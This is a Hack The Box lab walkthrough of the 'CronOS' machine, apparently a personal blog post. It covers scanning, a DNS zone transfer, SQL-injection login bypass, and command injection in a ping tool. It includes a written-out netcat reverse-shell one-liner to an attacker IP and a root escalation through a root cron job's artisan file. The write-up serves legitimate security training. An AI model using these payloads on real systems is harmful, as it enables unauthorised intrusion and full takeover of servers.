Published on

HTB CronOS

Authors

CronOS

Enumeration

nmap all ports, full enumerate

nmap -p- -sV -A <ip> --open -o full-enumerate.nmap

└─$ nmap -p- -sV -A $IP --open -o full-enumerate.nmap       
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-22 10:48 EDT
Nmap scan report for 10.129.227.211
Host is up (0.034s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.73 seconds

nmap (all identified TCP ports + default scripts & service versions)

nmap -p <1,2,3> -sV --script default --script http-methods --script http-headers <ip> -o <ip>-identified-ports.nmap

└─$ nmap -p 22,53,80 --script default --script http-methods --script http-headers $IP -o identified-ports.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-22 10:51 EDT
Nmap scan report for 10.129.227.211
Host is up (0.034s latency).

PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http
| http-headers: 
|   Date: Sat, 22 Jul 2023 14:51:37 GMT
|   Server: Apache/2.4.18 (Ubuntu)
|   Last-Modified: Fri, 01 Jan 2021 00:29:56 GMT
|   ETag: "2caf-5b7cbd6fbb19d"
|   Accept-Ranges: bytes
|   Content-Length: 11439
|   Vary: Accept-Encoding
|   Connection: close
|   Content-Type: text/html
|   
|_  (Request type: HEAD)
|_http-title: Apache2 Ubuntu Default Page: It works

Nmap done: 1 IP address (1 host up) scanned in 15.98 seconds

nmap (vuln scan)

nmap -p <1,2,3> --script vuln <ip> -o <ip>-vuln.nmap

slowloris DOS attack on port 80 aside from that nothing

Port Enumeration

**Port 80

  • Apache2 httpd 2.4.18
    • Whenever I see Apache like this, this tells me there has to be a configuration issue somewhere

Untitled


Exploitation

**********Port 80

Foothold

  1. nslookup DNS recon ⭐
└─$ nslookup
> 10.129.227.211
** server can't find 211.227.129.10.in-addr.arpa: NXDOMAIN
> server 10.129.227.211
Default server: 10.129.227.211
Address: 10.129.227.211#53
> 10.129.227.211
;; communications error to 10.129.227.211#53: timed out
211.227.129.10.in-addr.arpa	name = ns1.cronos.htb.
>
  1. Then, we enumerate with dig: as a zone transfer dig axfr cronos.htb @10.129.227.211
└─$ dig axfr cronos.htb @10.129.227.211                                                                          1
; <<>> DiG 9.18.16-1-Debian <<>> axfr cronos.htb @10.129.227.211
;; global options: +cmd
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.		604800	IN	NS	ns1.cronos.htb.
cronos.htb.		604800	IN	A	10.10.10.13
admin.cronos.htb.	604800	IN	A	10.10.10.13
ns1.cronos.htb.		604800	IN	A	10.10.10.13
www.cronos.htb.		604800	IN	A	10.10.10.13
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 92 msec
;; SERVER: 10.129.227.211#53(10.129.227.211) (TCP)
;; WHEN: Sat Jul 22 12:23:21 EDT 2023
;; XFR size: 7 records (messages 1, bytes 203)
  1. We now see a bunch of new domain names, which again, are only accessible through /etc/hosts:
└─$ cat /etc/hosts      
127.0.0.1	localhost
127.0.1.1	CH.CH	CH
10.129.227.211  cronos.htb admin.cronos.htb ns1.cronos.htb www.cronos.htb
  1. admin.cronos.htb URL = login page:

Untitled

  1. Here we can try a common SQL injection method like
    1. user = admin
    2. pass = ‘ or ‘1’=1
    3. gets nothing, even with URL encoding, but this is good to check.
  2. SQLmap: grab the whole request made trying to login:
POST / HTTP/1.1
Host: admin.cronos.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://admin.cronos.htb
DNT: 1
Connection: close
Referer: http://admin.cronos.htb/
Cookie: PHPSESSID=an1b11g14nbpito0le7fsqsr02
Upgrade-Insecure-Requests: 1

username=admin&password=admin
  1. Create it into a nano login.request file we can use with sqlmap -r login.request

Untitled

  1. This tells me that the “username” field appears to be injectable, so we can change the username field to something like:
    1. user = admin’— —
    2. aejtaetajey (doesnt matter)
    3. and we get in
  1. Either way we are taken to http://admin.cronos.htb/welcome.php

  2. Brought to a Net Tool that shows traceroute & ping, so tried basic command injection with 8.8.8.8;whoami:

    Untitled

Which worked

  1. Now we can try a reverse shell from here since we know we are talking directly to the linux server: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.3 4455 >/tmp/f (first one from HackTools) (also make sure to URL encode it if doing it through burpsuite

and it worked

Root

crontab

  1. Since this box is called CronOS I think it’s safe to say we might need to execute crontab.
  2. cat /etc/crontab
www-data@cronos:/etc$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *	root	php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
#
www-data@cronos:/etc$
  1. We can see that php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1 is running as root every minute.
  2. If I just replace that artisan file with a reverse shell, cronjob should execute it and give me root.

Untitled

  1. 1…2… skip a few… root!

Untitled


Useful resource links

Lessons Learned

nslookup has some wild shit you can do with it for dns recon

  • make sure to URL encode payloads in burpsuite
  • ippsec’s method here for getting privesc was a lot mroe tedious and to be honest not as easy and did not make as much sense as mine did. Simply just replace the file running as root in the crontab as a reverse shell, and ez pz cake